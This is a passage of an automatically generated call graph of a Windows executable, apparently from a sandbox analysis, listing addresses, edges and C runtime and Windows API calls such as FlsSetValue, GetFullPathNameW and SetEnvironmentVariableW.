16702->16705 16710 7ff6fac001d8 EnterCriticalSection 16705->16710 16723 7ff6fac001d8 EnterCriticalSection 16711->16723 16726 7ff6fabfa367 16725->16726 16729 7ff6fabfa3d8 16726->16729 16728 7ff6fabfa38e 16728->16602 16739 7ff6fabfa120 16729->16739 16733 7ff6fabfa413 16733->16728 16740 7ff6fabfa13c GetLastError 16739->16740 16741 7ff6fabfa177 16739->16741 16742 7ff6fabfa14c 16740->16742 16741->16733 16745 7ff6fabfa18c 16741->16745 16752 7ff6fabfaf10 16742->16752 16746 7ff6fabfa1c0 16745->16746 16747 7ff6fabfa1a8 GetLastError SetLastError 16745->16747 16746->16733 16748 7ff6fabfa4c4 IsProcessorFeaturePresent 16746->16748 16747->16746 16749 7ff6fabfa4d7 16748->16749 16769 7ff6fabfa1d8 16749->16769 16753 7ff6fabfaf2f FlsGetValue 16752->16753 16754 7ff6fabfaf4a FlsSetValue 16752->16754 16755 7ff6fabfaf44 16753->16755 16757 7ff6fabfa167 SetLastError 16753->16757 16756 7ff6fabfaf57 16754->16756 16754->16757 16755->16754 16758 7ff6fabfeb84 _get_daylight 11 API calls 16756->16758 16757->16741 16759 7ff6fabfaf66 16758->16759 16760 7ff6fabfaf84 FlsSetValue 16759->16760 16761 7ff6fabfaf74 FlsSetValue 16759->16761 16763 7ff6fabfafa2 16760->16763 16764 7ff6fabfaf90 FlsSetValue 16760->16764 16762 7ff6fabfaf7d 16761->16762 16765 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16762->16765 16766 7ff6fabfaa7c _get_daylight 11 API calls 16763->16766 16764->16762 16765->16757 16767 7ff6fabfafaa 16766->16767 16768 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16767->16768 16768->16757 16770 7ff6fabfa212 _isindst memcpy_s 16769->16770 16771 7ff6fabfa23a RtlCaptureContext RtlLookupFunctionEntry 16770->16771 16772 7ff6fabfa274 RtlVirtualUnwind 16771->16772 16773 7ff6fabfa2aa IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16771->16773 16772->16773 16774 7ff6fabfa2fc _isindst 16773->16774 16775 7ff6fabea9b0 _log10_special 8 API calls 16774->16775 16776 7ff6fabfa31b GetCurrentProcess TerminateProcess 16775->16776 
16778 7ff6fabf79d8 16777->16778 16779 7ff6fabf7a46 16777->16779 16778->16779 16781 7ff6fabf79dd 16778->16781 16814 7ff6fac005cc 16779->16814 16782 7ff6fabf79f5 16781->16782 16783 7ff6fabf7a12 16781->16783 16789 7ff6fabf778c GetFullPathNameW 16782->16789 16797 7ff6fabf7800 GetFullPathNameW 16783->16797 16788 7ff6fabf7a0a __vcrt_freefls 16788->16612 16790 7ff6fabf77b2 GetLastError 16789->16790 16793 7ff6fabf77c8 16789->16793 16791 7ff6fabfb07c _fread_nolock 11 API calls 16790->16791 16794 7ff6fabf77bf 16791->16794 16792 7ff6fabf77c4 16792->16788 16793->16792 16796 7ff6fabfb108 _get_daylight 11 API calls 16793->16796 16795 7ff6fabfb108 _get_daylight 11 API calls 16794->16795 16795->16792 16796->16792 16798 7ff6fabf7833 GetLastError 16797->16798 16802 7ff6fabf7849 __vcrt_freefls 16797->16802 16799 7ff6fabfb07c _fread_nolock 11 API calls 16798->16799 16800 7ff6fabf7840 16799->16800 16803 7ff6fabfb108 _get_daylight 11 API calls 16800->16803 16801 7ff6fabf7845 16805 7ff6fabf78d8 16801->16805 16802->16801 16804 7ff6fabf78a3 GetFullPathNameW 16802->16804 16803->16801 16804->16798 16804->16801 16806 7ff6fabf794c memcpy_s 16805->16806 16808 7ff6fabf7901 memcpy_s 16805->16808 16806->16788 16807 7ff6fabf7935 16809 7ff6fabfb108 _get_daylight 11 API calls 16807->16809 16808->16806 16808->16807 16811 7ff6fabf796e 16808->16811 16813 7ff6fabf793a 16809->16813 16810 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 16810->16806 16811->16806 16812 7ff6fabfb108 _get_daylight 11 API calls 16811->16812 16812->16813 16813->16810 16817 7ff6fac003dc 16814->16817 16818 7ff6fac0041e 16817->16818 16819 7ff6fac00407 16817->16819 16820 7ff6fac00443 16818->16820 16821 7ff6fac00422 16818->16821 16822 7ff6fabfb108 _get_daylight 11 API calls 16819->16822 16855 7ff6fabff4b8 16820->16855 16843 7ff6fac00548 16821->16843 16825 7ff6fac0040c 16822->16825 16829 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 16825->16829 16827 7ff6fac00448 16832 7ff6fac004ed 16827->16832 16838 7ff6fac0046f 
16827->16838 16828 7ff6fac0042b 16830 7ff6fabfb0e8 _fread_nolock 11 API calls 16828->16830 16842 7ff6fac00417 __vcrt_freefls 16829->16842 16831 7ff6fac00430 16830->16831 16835 7ff6fabfb108 _get_daylight 11 API calls 16831->16835 16832->16819 16833 7ff6fac004f5 16832->16833 16836 7ff6fabf778c 13 API calls 16833->16836 16834 7ff6fabea9b0 _log10_special 8 API calls 16837 7ff6fac0053d 16834->16837 16835->16825 16836->16842 16837->16788 16839 7ff6fabf7800 14 API calls 16838->16839 16840 7ff6fac004b3 16839->16840 16841 7ff6fabf78d8 37 API calls 16840->16841 16840->16842 16841->16842 16842->16834 16844 7ff6fac00592 16843->16844 16845 7ff6fac00562 16843->16845 16846 7ff6fac0059d GetDriveTypeW 16844->16846 16849 7ff6fac0057d 16844->16849 16847 7ff6fabfb0e8 _fread_nolock 11 API calls 16845->16847 16846->16849 16848 7ff6fac00567 16847->16848 16850 7ff6fabfb108 _get_daylight 11 API calls 16848->16850 16851 7ff6fabea9b0 _log10_special 8 API calls 16849->16851 16852 7ff6fac00572 16850->16852 16853 7ff6fac00427 16851->16853 16854 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 16852->16854 16853->16827 16853->16828 16854->16849 16869 7ff6fac0a5b0 16855->16869 16858 7ff6fabff505 16861 7ff6fabea9b0 _log10_special 8 API calls 16858->16861 16859 7ff6fabff52c 16860 7ff6fabfeb84 _get_daylight 11 API calls 16859->16860 16862 7ff6fabff53b 16860->16862 16863 7ff6fabff599 16861->16863 16864 7ff6fabff545 GetCurrentDirectoryW 16862->16864 16865 7ff6fabff554 16862->16865 16863->16827 16864->16865 16866 7ff6fabff559 16864->16866 16867 7ff6fabfb108 _get_daylight 11 API calls 16865->16867 16868 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16866->16868 16867->16866 16868->16858 16870 7ff6fabff4ee GetCurrentDirectoryW 16869->16870 16870->16858 16870->16859 16872 7ff6fabff631 16871->16872 16873 7ff6fabff655 16871->16873 16872->16873 16874 7ff6fabff636 16872->16874 16876 7ff6fabff68f 16873->16876 16877 7ff6fabff6ae 16873->16877 16875 7ff6fabfb108 _get_daylight 11 
API calls 16874->16875 16878 7ff6fabff63b 16875->16878 16879 7ff6fabfb108 _get_daylight 11 API calls 16876->16879 16888 7ff6fabf4c38 16877->16888 16881 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 16878->16881 16882 7ff6fabff694 16879->16882 16884 7ff6fabff646 16881->16884 16883 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 16882->16883 16885 7ff6fabff69f 16883->16885 16884->16633 16885->16633 16886 7ff6fac05320 51 API calls 16887 7ff6fabff6bb 16886->16887 16887->16885 16887->16886 16889 7ff6fabf4c5c 16888->16889 16895 7ff6fabf4c57 16888->16895 16889->16895 16896 7ff6fabfacd0 GetLastError 16889->16896 16895->16887 16897 7ff6fabfacf4 FlsGetValue 16896->16897 16898 7ff6fabfad11 FlsSetValue 16896->16898 16899 7ff6fabfad0b 16897->16899 16901 7ff6fabfad01 16897->16901 16900 7ff6fabfad23 16898->16900 16898->16901 16899->16898 16903 7ff6fabfeb84 _get_daylight 11 API calls 16900->16903 16902 7ff6fabfad7d SetLastError 16901->16902 16904 7ff6fabfad9d 16902->16904 16905 7ff6fabf4c77 16902->16905 16906 7ff6fabfad32 16903->16906 16926 7ff6fabfa08c 16904->16926 16918 7ff6fabfd7cc 16905->16918 16908 7ff6fabfad50 FlsSetValue 16906->16908 16909 7ff6fabfad40 FlsSetValue 16906->16909 16912 7ff6fabfad6e 16908->16912 16913 7ff6fabfad5c FlsSetValue 16908->16913 16911 7ff6fabfad49 16909->16911 16915 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16911->16915 16914 7ff6fabfaa7c _get_daylight 11 API calls 16912->16914 16913->16911 16916 7ff6fabfad76 16914->16916 16915->16901 16917 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16916->16917 16917->16902 16919 7ff6fabfd7e1 16918->16919 16920 7ff6fabf4c9a 16918->16920 16919->16920 16970 7ff6fac03104 16919->16970 16922 7ff6fabfd838 16920->16922 16923 7ff6fabfd860 16922->16923 16924 7ff6fabfd84d 16922->16924 16923->16895 16924->16923 16983 7ff6fac02450 16924->16983 16935 7ff6fac03450 16926->16935 16961 7ff6fac03408 16935->16961 16966 7ff6fac001d8 EnterCriticalSection 
16961->16966 16971 7ff6fabfacd0 __CxxCallCatchBlock 45 API calls 16970->16971 16972 7ff6fac03113 16971->16972 16973 7ff6fac0315e 16972->16973 16982 7ff6fac001d8 EnterCriticalSection 16972->16982 16973->16920 16984 7ff6fabfacd0 __CxxCallCatchBlock 45 API calls 16983->16984 16985 7ff6fac02459 16984->16985 16986 7ff6fac006d4 16987 7ff6fac006f8 16986->16987 16990 7ff6fac00708 16986->16990 16988 7ff6fabfb108 _get_daylight 11 API calls 16987->16988 16989 7ff6fac006fd 16988->16989 16991 7ff6fac009e8 16990->16991 16992 7ff6fac0072a 16990->16992 16993 7ff6fabfb108 _get_daylight 11 API calls 16991->16993 16994 7ff6fac0074b 16992->16994 17135 7ff6fac00d90 16992->17135 16995 7ff6fac009ed 16993->16995 16998 7ff6fac007bd 16994->16998 17000 7ff6fac00771 16994->17000 17005 7ff6fac007b1 16994->17005 16997 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16995->16997 16997->16989 17002 7ff6fabfeb84 _get_daylight 11 API calls 16998->17002 17015 7ff6fac00780 16998->17015 16999 7ff6fac0086a 17010 7ff6fac00887 16999->17010 17016 7ff6fac008d9 16999->17016 17150 7ff6fabf927c 17000->17150 17006 7ff6fac007d3 17002->17006 17004 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17004->16989 17005->16999 17005->17015 17156 7ff6fac0718c 17005->17156 17011 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17006->17011 17008 7ff6fac0077b 17013 7ff6fabfb108 _get_daylight 11 API calls 17008->17013 17009 7ff6fac00799 17009->17005 17017 7ff6fac00d90 45 API calls 17009->17017 17014 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17010->17014 17012 7ff6fac007e1 17011->17012 17012->17005 17012->17015 17019 7ff6fabfeb84 _get_daylight 11 API calls 17012->17019 17013->17015 17021 7ff6fac00890 17014->17021 17015->17004 17016->17015 17018 7ff6fac031dc 40 API calls 17016->17018 17017->17005 17020 7ff6fac00916 17018->17020 17022 7ff6fac00803 17019->17022 17023 7ff6fabfa0e4 
Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17020->17023 17024 7ff6fac031dc 40 API calls 17021->17024 17030 7ff6fac00895 17021->17030 17025 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17022->17025 17026 7ff6fac00920 17023->17026 17028 7ff6fac008c1 17024->17028 17025->17005 17026->17015 17026->17030 17027 7ff6fac009dc 17029 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17027->17029 17031 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17028->17031 17029->16989 17030->17027 17030->17030 17032 7ff6fabfeb84 _get_daylight 11 API calls 17030->17032 17031->17030 17033 7ff6fac00964 17032->17033 17034 7ff6fac00975 17033->17034 17035 7ff6fac0096c 17033->17035 17117 7ff6fabfa02c 17034->17117 17036 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17035->17036 17038 7ff6fac00973 17036->17038 17042 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17038->17042 17040 7ff6fac0098c 17192 7ff6fac072a4 17040->17192 17041 7ff6fac00a17 17044 7ff6fabfa4c4 _isindst 17 API calls 17041->17044 17042->16989 17045 7ff6fac00a2b 17044->17045 17047 7ff6fac00a54 17045->17047 17054 7ff6fac00a64 17045->17054 17050 7ff6fabfb108 _get_daylight 11 API calls 17047->17050 17048 7ff6fac009d4 17051 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17048->17051 17049 7ff6fac009b3 17052 7ff6fabfb108 _get_daylight 11 API calls 17049->17052 17079 7ff6fac00a59 17050->17079 17051->17027 17053 7ff6fac009b8 17052->17053 17056 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17053->17056 17055 7ff6fac00d47 17054->17055 17057 7ff6fac00a86 17054->17057 17058 7ff6fabfb108 _get_daylight 11 API calls 17055->17058 17056->17038 17059 7ff6fac00aa3 17057->17059 17211 7ff6fac00e78 17057->17211 17060 7ff6fac00d4c 17058->17060 17063 7ff6fac00b17 17059->17063 17065 7ff6fac00acb 17059->17065 17073 7ff6fac00b0b 17059->17073 
17062 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17060->17062 17062->17079 17068 7ff6fac00b3f 17063->17068 17069 7ff6fabfeb84 _get_daylight 11 API calls 17063->17069 17084 7ff6fac00ada 17063->17084 17064 7ff6fac00bca 17077 7ff6fac00be7 17064->17077 17085 7ff6fac00c3a 17064->17085 17226 7ff6fabf92b8 17065->17226 17071 7ff6fabfeb84 _get_daylight 11 API calls 17068->17071 17068->17073 17068->17084 17074 7ff6fac00b31 17069->17074 17078 7ff6fac00b61 17071->17078 17072 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17072->17079 17073->17064 17073->17084 17232 7ff6fac0704c 17073->17232 17080 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17074->17080 17075 7ff6fac00ad5 17081 7ff6fabfb108 _get_daylight 11 API calls 17075->17081 17076 7ff6fac00af3 17076->17073 17087 7ff6fac00e78 45 API calls 17076->17087 17082 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17077->17082 17083 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17078->17083 17080->17068 17081->17084 17086 7ff6fac00bf0 17082->17086 17083->17073 17084->17072 17085->17084 17126 7ff6fac031dc 17085->17126 17091 7ff6fac031dc 40 API calls 17086->17091 17094 7ff6fac00bf6 17086->17094 17087->17073 17089 7ff6fac00c78 17090 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17089->17090 17092 7ff6fac00c82 17090->17092 17095 7ff6fac00c22 17091->17095 17092->17084 17092->17094 17093 7ff6fac00d3b 17097 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17093->17097 17094->17093 17098 7ff6fabfeb84 _get_daylight 11 API calls 17094->17098 17096 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17095->17096 17096->17094 17097->17079 17099 7ff6fac00cc7 17098->17099 17100 7ff6fac00ccf 17099->17100 17101 7ff6fac00cd8 17099->17101 17102 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17100->17102 
17256 7ff6fac00374 17101->17256 17104 7ff6fac00cd6 17102->17104 17108 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17104->17108 17106 7ff6fac00cee SetEnvironmentVariableW 17109 7ff6fac00d33 17106->17109 17110 7ff6fac00d12 17106->17110 17107 7ff6fac00d7b 17111 7ff6fabfa4c4 _isindst 17 API calls 17107->17111 17108->17079 17113 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17109->17113 17114 7ff6fabfb108 _get_daylight 11 API calls 17110->17114 17112 7ff6fac00d8f 17111->17112 17113->17093 17115 7ff6fac00d17 17114->17115 17116 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17115->17116 17116->17104 17118 7ff6fabfa043 17117->17118 17119 7ff6fabfa039 17117->17119 17120 7ff6fabfb108 _get_daylight 11 API calls 17118->17120 17119->17118 17124 7ff6fabfa05e 17119->17124 17121 7ff6fabfa04a 17120->17121 17122 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 17121->17122 17123 7ff6fabfa056 17122->17123 17123->17040 17123->17041 17124->17123 17125 7ff6fabfb108 _get_daylight 11 API calls 17124->17125 17125->17121 17127 7ff6fac031fe 17126->17127 17128 7ff6fac0321b 17126->17128 17127->17128 17129 7ff6fac0320c 17127->17129 17132 7ff6fac03225 17128->17132 17277 7ff6fac07c98 17128->17277 17130 7ff6fabfb108 _get_daylight 11 API calls 17129->17130 17134 7ff6fac03211 memcpy_s 17130->17134 17265 7ff6fac07cd4 17132->17265 17134->17089 17136 7ff6fac00dc5 17135->17136 17137 7ff6fac00dad 17135->17137 17138 7ff6fabfeb84 _get_daylight 11 API calls 17136->17138 17137->16994 17144 7ff6fac00de9 17138->17144 17139 7ff6fac00e4a 17141 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17139->17141 17140 7ff6fabfa08c __CxxCallCatchBlock 45 API calls 17142 7ff6fac00e74 17140->17142 17141->17137 17143 7ff6fabfeb84 _get_daylight 11 API calls 17143->17144 17144->17139 17144->17143 17145 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17144->17145 17146 7ff6fabfa02c 
__std_exception_copy 37 API calls 17144->17146 17147 7ff6fac00e59 17144->17147 17149 7ff6fac00e6e 17144->17149 17145->17144 17146->17144 17148 7ff6fabfa4c4 _isindst 17 API calls 17147->17148 17148->17149 17149->17140 17151 7ff6fabf9295 17150->17151 17152 7ff6fabf928c 17150->17152 17151->17008 17151->17009 17152->17151 17291 7ff6fabf8d54 17152->17291 17157 7ff6fac0633c 17156->17157 17158 7ff6fac07199 17156->17158 17160 7ff6fac06349 17157->17160 17161 7ff6fac0637f 17157->17161 17159 7ff6fabf4c38 45 API calls 17158->17159 17163 7ff6fac071cd 17159->17163 17164 7ff6fabfb108 _get_daylight 11 API calls 17160->17164 17178 7ff6fac062f0 17160->17178 17162 7ff6fac063a9 17161->17162 17169 7ff6fac063ce 17161->17169 17165 7ff6fabfb108 _get_daylight 11 API calls 17162->17165 17166 7ff6fac071d2 17163->17166 17170 7ff6fac071e3 17163->17170 17174 7ff6fac071fa 17163->17174 17167 7ff6fac06353 17164->17167 17168 7ff6fac063ae 17165->17168 17166->17005 17171 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 17167->17171 17173 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 17168->17173 17179 7ff6fabf4c38 45 API calls 17169->17179 17185 7ff6fac063b9 17169->17185 17175 7ff6fabfb108 _get_daylight 11 API calls 17170->17175 17172 7ff6fac0635e 17171->17172 17172->17005 17173->17185 17176 7ff6fac07204 17174->17176 17177 7ff6fac07216 17174->17177 17180 7ff6fac071e8 17175->17180 17182 7ff6fabfb108 _get_daylight 11 API calls 17176->17182 17183 7ff6fac0723e 17177->17183 17184 7ff6fac07227 17177->17184 17178->17005 17179->17185 17181 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 17180->17181 17181->17166 17186 7ff6fac07209 17182->17186 17554 7ff6fac09034 17183->17554 17545 7ff6fac0638c 17184->17545 17185->17005 17189 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 17186->17189 17189->17166 17191 7ff6fabfb108 _get_daylight 11 API calls 17191->17166 17193 7ff6fabf4c38 45 API calls 17192->17193 17194 7ff6fac0730a 17193->17194 17196 7ff6fac07318 17194->17196 17594 7ff6fabfee10 
17194->17594 17597 7ff6fabf52c8 17196->17597 17199 7ff6fac07404 17202 7ff6fac07415 17199->17202 17203 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17199->17203 17200 7ff6fabf4c38 45 API calls 17201 7ff6fac07387 17200->17201 17205 7ff6fabfee10 5 API calls 17201->17205 17210 7ff6fac07390 17201->17210 17204 7ff6fac009af 17202->17204 17206 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17202->17206 17203->17202 17204->17048 17204->17049 17205->17210 17206->17204 17207 7ff6fabf52c8 14 API calls 17208 7ff6fac073eb 17207->17208 17208->17199 17209 7ff6fac073f3 SetEnvironmentVariableW 17208->17209 17209->17199 17210->17207 17212 7ff6fac00e9b 17211->17212 17213 7ff6fac00eb8 17211->17213 17212->17059 17214 7ff6fabfeb84 _get_daylight 11 API calls 17213->17214 17220 7ff6fac00edc 17214->17220 17215 7ff6fac00f3d 17217 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17215->17217 17216 7ff6fabfa08c __CxxCallCatchBlock 45 API calls 17218 7ff6fac00f66 17216->17218 17217->17212 17219 7ff6fabfeb84 _get_daylight 11 API calls 17219->17220 17220->17215 17220->17219 17221 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17220->17221 17222 7ff6fac00374 37 API calls 17220->17222 17223 7ff6fac00f4c 17220->17223 17225 7ff6fac00f60 17220->17225 17221->17220 17222->17220 17224 7ff6fabfa4c4 _isindst 17 API calls 17223->17224 17224->17225 17225->17216 17227 7ff6fabf92c8 17226->17227 17230 7ff6fabf92d1 17226->17230 17227->17230 17619 7ff6fabf8dc8 17227->17619 17230->17075 17230->17076 17233 7ff6fac07086 17232->17233 17234 7ff6fac07059 17232->17234 17238 7ff6fac070ca 17233->17238 17240 7ff6fac070e9 17233->17240 17254 7ff6fac070be __crtLCMapStringW 17233->17254 17234->17233 17235 7ff6fac0705e 17234->17235 17236 7ff6fabfb108 _get_daylight 11 API calls 17235->17236 17237 7ff6fac07063 17236->17237 17239 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 17237->17239 17241 7ff6fabfb108 
_get_daylight 11 API calls 17238->17241 17242 7ff6fac0706e 17239->17242 17243 7ff6fac07105 17240->17243 17244 7ff6fac070f3 17240->17244 17245 7ff6fac070cf 17241->17245 17242->17073 17248 7ff6fabf4c38 45 API calls 17243->17248 17247 7ff6fabfb108 _get_daylight 11 API calls 17244->17247 17246 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 17245->17246 17246->17254 17249 7ff6fac070f8 17247->17249 17250 7ff6fac07112 17248->17250 17251 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 17249->17251 17250->17254 17666 7ff6fac08bf0 17250->17666 17251->17254 17254->17073 17255 7ff6fabfb108 _get_daylight 11 API calls 17255->17254 17257 7ff6fac00381 17256->17257 17258 7ff6fac0038b 17256->17258 17257->17258 17263 7ff6fac003a7 17257->17263 17259 7ff6fabfb108 _get_daylight 11 API calls 17258->17259 17260 7ff6fac00393 17259->17260 17261 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 17260->17261 17262 7ff6fac0039f 17261->17262 17262->17106 17262->17107 17263->17262 17264 7ff6fabfb108 _get_daylight 11 API calls 17263->17264 17264->17260 17266 7ff6fac07cf3 17265->17266 17267 7ff6fac07ce9 17265->17267 17269 7ff6fac07cf8 17266->17269 17275 7ff6fac07cff _get_daylight 17266->17275 17284 7ff6fabfd444 17267->17284 17270 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17269->17270 17273 7ff6fac07cf1 17270->17273 17271 7ff6fac07d05 17274 7ff6fabfb108 _get_daylight 11 API calls 17271->17274 17272 7ff6fac07d32 RtlReAllocateHeap 17272->17273 17272->17275 17273->17134 17274->17273 17275->17271 17275->17272 17276 7ff6fac03390 _get_daylight 2 API calls 17275->17276 17276->17275 17278 7ff6fac07ca1 17277->17278 17279 7ff6fac07cba HeapSize 17277->17279 17280 7ff6fabfb108 _get_daylight 11 API calls 17278->17280 17281 7ff6fac07ca6 17280->17281 17282 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 17281->17282 17283 7ff6fac07cb1 17282->17283 17283->17132 17285 7ff6fabfd48f 17284->17285 17289 7ff6fabfd453 _get_daylight 17284->17289 17286 7ff6fabfb108 
_get_daylight 11 API calls 17285->17286 17288 7ff6fabfd48d 17286->17288 17287 7ff6fabfd476 HeapAlloc 17287->17288 17287->17289 17288->17273 17289->17285 17289->17287 17290 7ff6fac03390 _get_daylight 2 API calls 17289->17290 17290->17289 17292 7ff6fabf8d6d 17291->17292 17293 7ff6fabf8d69 17291->17293 17314 7ff6fac023f0 17292->17314 17293->17151 17306 7ff6fabf90a8 17293->17306 17298 7ff6fabf8d7f 17300 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17298->17300 17299 7ff6fabf8d8b 17340 7ff6fabf8e38 17299->17340 17300->17293 17303 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17304 7ff6fabf8db2 17303->17304 17305 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17304->17305 17305->17293 17307 7ff6fabf90d1 17306->17307 17312 7ff6fabf90ea 17306->17312 17307->17151 17308 7ff6fabfeb84 _get_daylight 11 API calls 17308->17312 17309 7ff6fabf917a 17311 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17309->17311 17310 7ff6fac005f4 WideCharToMultiByte 17310->17312 17311->17307 17312->17307 17312->17308 17312->17309 17312->17310 17313 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17312->17313 17313->17312 17315 7ff6fac023fd 17314->17315 17316 7ff6fabf8d72 17314->17316 17359 7ff6fabfada4 17315->17359 17320 7ff6fac0272c GetEnvironmentStringsW 17316->17320 17321 7ff6fabf8d77 17320->17321 17322 7ff6fac0275c 17320->17322 17321->17298 17321->17299 17323 7ff6fac005f4 WideCharToMultiByte 17322->17323 17324 7ff6fac027ad 17323->17324 17325 7ff6fac027b4 FreeEnvironmentStringsW 17324->17325 17326 7ff6fabfd444 _fread_nolock 12 API calls 17324->17326 17325->17321 17327 7ff6fac027c7 17326->17327 17328 7ff6fac027cf 17327->17328 17329 7ff6fac027d8 17327->17329 17330 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17328->17330 17331 7ff6fac005f4 WideCharToMultiByte 17329->17331 17332 7ff6fac027d6 17330->17332 17333 7ff6fac027fb 
17331->17333 17332->17325 17334 7ff6fac027ff 17333->17334 17335 7ff6fac02809 17333->17335 17336 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17334->17336 17337 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17335->17337 17338 7ff6fac02807 FreeEnvironmentStringsW 17336->17338 17337->17338 17338->17321 17341 7ff6fabf8e5d 17340->17341 17342 7ff6fabfeb84 _get_daylight 11 API calls 17341->17342 17354 7ff6fabf8e93 17342->17354 17343 7ff6fabf8e9b 17344 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17343->17344 17346 7ff6fabf8d93 17344->17346 17345 7ff6fabf8f0e 17347 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17345->17347 17346->17303 17347->17346 17348 7ff6fabfeb84 _get_daylight 11 API calls 17348->17354 17349 7ff6fabf8efd 17539 7ff6fabf9064 17349->17539 17350 7ff6fabfa02c __std_exception_copy 37 API calls 17350->17354 17353 7ff6fabf8f33 17356 7ff6fabfa4c4 _isindst 17 API calls 17353->17356 17354->17343 17354->17345 17354->17348 17354->17349 17354->17350 17354->17353 17357 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17354->17357 17355 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17355->17343 17358 7ff6fabf8f46 17356->17358 17357->17354 17360 7ff6fabfadb5 FlsGetValue 17359->17360 17361 7ff6fabfadd0 FlsSetValue 17359->17361 17362 7ff6fabfadc2 17360->17362 17363 7ff6fabfadca 17360->17363 17361->17362 17364 7ff6fabfaddd 17361->17364 17365 7ff6fabfa08c __CxxCallCatchBlock 45 API calls 17362->17365 17367 7ff6fabfadc8 17362->17367 17363->17361 17366 7ff6fabfeb84 _get_daylight 11 API calls 17364->17366 17368 7ff6fabfae45 17365->17368 17369 7ff6fabfadec 17366->17369 17379 7ff6fac020c4 17367->17379 17370 7ff6fabfae0a FlsSetValue 17369->17370 17371 7ff6fabfadfa FlsSetValue 17369->17371 17372 7ff6fabfae28 17370->17372 17373 7ff6fabfae16 FlsSetValue 17370->17373 17374 7ff6fabfae03 17371->17374 17375 
